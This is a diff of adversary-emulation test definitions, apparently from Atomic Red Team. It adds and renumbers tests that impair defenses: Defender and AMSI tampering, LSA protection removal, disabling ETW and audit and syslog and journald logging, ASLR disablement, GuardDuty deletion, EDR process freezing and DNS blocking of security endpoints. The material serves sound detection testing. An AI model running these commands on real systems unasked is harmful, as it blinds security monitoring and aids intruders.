### Atomic Test #43: Suspend History
suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
@@ -1209,7 +1292,7 @@ set +o history
```sh
set -o history
```
### Atomic Test #41: Reboot Linux Host via Kernel System Request
### Atomic Test #44: Reboot Linux Host via Kernel System Request
reboot system via system request seen in Awfulshred wiper.
@@ -1224,7 +1307,7 @@ echo 1> /proc/sys/kernel/sysrq
echo b> /proc/sysrq-trigger
```
### Atomic Test #42: Clear Pagging Cache
### Atomic Test #45: Clear Pagging Cache
clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
@@ -1240,7 +1323,7 @@ free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches
```
### Atomic Test #43: Disable Memory Swap
### Atomic Test #46: Disable Memory Swap
disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional
payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
@@ -1265,7 +1348,7 @@ swapon -a
sleep 2
sync
```
### Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)
### Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
The pre-req needs to be ran in order to setup HVCI and have it enabled.
@@ -1313,7 +1396,7 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorE
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
```
### Atomic Test #45: AMSI Bypass - Override AMSI via COM
### Atomic Test #48: AMSI Bypass - Override AMSI via COM
With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
This is currently being used by AsyncRAT and others.
@@ -1335,7 +1418,7 @@ REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InPro
```cmd
REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
```
### Atomic Test #46: AWS - GuardDuty Suspension or Deletion
### Atomic Test #49: AWS - GuardDuty Suspension or Deletion
Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.
@@ -1379,7 +1462,7 @@ cat ~/.aws/credentials | grep "default"
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
```
### Atomic Test #47: Tamper with Defender ATP on Linux/MacOS
### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
@@ -1398,7 +1481,7 @@ sudo mdatp config real-time-protection --value disabled
```sh
sudo mdatp config real-time-protection --value enabled
```
### Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe
### Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
@@ -1451,7 +1534,7 @@ reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
```
### Atomic Test #49: Tamper with Windows Defender Registry - Powershell
### Atomic Test #52: Tamper with Windows Defender Registry - Powershell
Disable Windows Defender by tampering with windows defender registry through powershell
@@ -1504,7 +1587,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "Tam
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
```
### Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI
### Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
@@ -1547,7 +1630,7 @@ if (-not $RequiredModule) {exit 1}
Install-Module -Name VMware.PowerCLI -Confirm:$false
```
### Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune
### Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
@@ -1580,7 +1663,7 @@ Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
```
### Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO
### Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
@@ -1607,7 +1690,7 @@ Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
```
### Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key
### Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
@@ -1628,7 +1711,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name
```powershell
Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
```
### Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
### Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
@@ -1647,7 +1730,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f
```
### Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
### Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
@@ -1666,7 +1749,7 @@ New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Eve
```powershell
New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force
```
### Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd
### Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
@@ -1691,7 +1774,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f
```
### Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell
### Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
@@ -1716,7 +1799,7 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev
```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
```
### Atomic Test #58: Freeze PPL-protected process with EDR-Freeze
### Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
@@ -1882,7 +1965,7 @@ Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | O
Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
Write-Output "File deleted: $edrFreezeExe"
```
### Atomic Test #59: Disable ASLR Via sysctl parameters - Linux
### Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
@@ -1901,3 +1984,378 @@ sysctl -w kernel.randomize_va_space=0
```bash
sysctl -w kernel.randomize_va_space=2
```
### Atomic Test #63: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
```
#### Cleanup Commands
```bash
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
```
### Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
```
#### Cleanup Commands
```sh
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
```
### Atomic Test #65: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
#### Cleanup Commands
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
### Atomic Test #66: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
```
#### Cleanup Commands
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
```
### Atomic Test #67: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** Windows
**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
| session | The session to disable. | string | EventLog-Application|
| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
```
#### Cleanup Commands
```powershell
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
```
#### Dependencies: Run with `powershell`!
##### Description: PSExec must be installed on the machine.
###### Check Prereq Commands
```powershell
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```
### Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
```
#### Cleanup Commands
```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
```
### Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
```
### Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
### Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
### Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
#### Attack Commands: Run with `command_prompt`!
```cmd
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
#### Attack Commands: Run with `powershell`!
```powershell
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
```
### Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
```
### Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
```
#### Cleanup Commands
```powershell
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
```
atomics/T1562.001/T1562.001.yaml → atomics/T1685/T1685.yaml
+319 -3
View File
@@ -1,6 +1,53 @@
attack_technique: T1562.001
display_name: 'Impair Defenses: Disable or Modify Tools'
attack_technique: T1685
display_name: 'Disable or Modify Tools'
atomic_tests:
- name: Windows Disable LSA Protection
auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
description: |
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
supported_platforms:
- windows
executor:
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable journal logging via systemctl utility
auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
description: |
The atomic test disables the journal logging using built-in systemctl utility
supported_platforms:
- linux
executor:
command: |
sudo systemctl stop systemd-journald #disables journal logging
cleanup_command: |
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
name: sh
elevation_required: true
- name: Disable journal logging via sed utility
auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
description: |
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
supported_platforms:
- linux
executor:
command: |
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
cleanup_command: |
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
name: sh
elevation_required: true
- name: Disable syslog
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
description: |
@@ -246,7 +293,7 @@ atomic_tests:
sysmon_exe:
description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)
type: path
default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe
default: PathToAtomicsFolder\T1685\bin\sysmon.exe
dependency_executor_name: powershell
dependencies:
- description: |
@@ -1370,3 +1417,272 @@ atomic_tests:
sysctl -w kernel.randomize_va_space=2
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on Linux Host'
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
audisp_config_file_name:
description: The name of the audispd configuration file to be changed
type: string
default: audispd.conf
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: auditd.conf
libaudit_config_file_name:
description: The name of the libaudit configuration file to be changed
type: string
default: libaudit.conf
executor:
command: |
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
cleanup_command: |
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on FreeBSD Host'
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: audit_event
executor:
command: |
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
cleanup_command: |
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
name: sh
elevation_required: true
- name: 'Logging Configuration Changes on Linux Host'
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
rsyslog_config_file_name:
description: The name of the rsyslog configuration file to be changed
type: string
default: rsyslog.conf
syslog_ng_config_file_name:
description: The name of the syslog-ng configuration file to be changed
type: string
default: syslog-ng.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
name: bash
elevation_required: true
- name: 'Logging Configuration Changes on FreeBSD Host'
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
name: sh
elevation_required: true
- name: Disable Powershell ETW Provider - Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
supported_platforms:
- windows
input_arguments:
ps_exec_location:
description: Location of PSExec.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
session:
description: The session to disable.
type: string
default: EventLog-Application
provider:
description: The provider to disable.
type: string
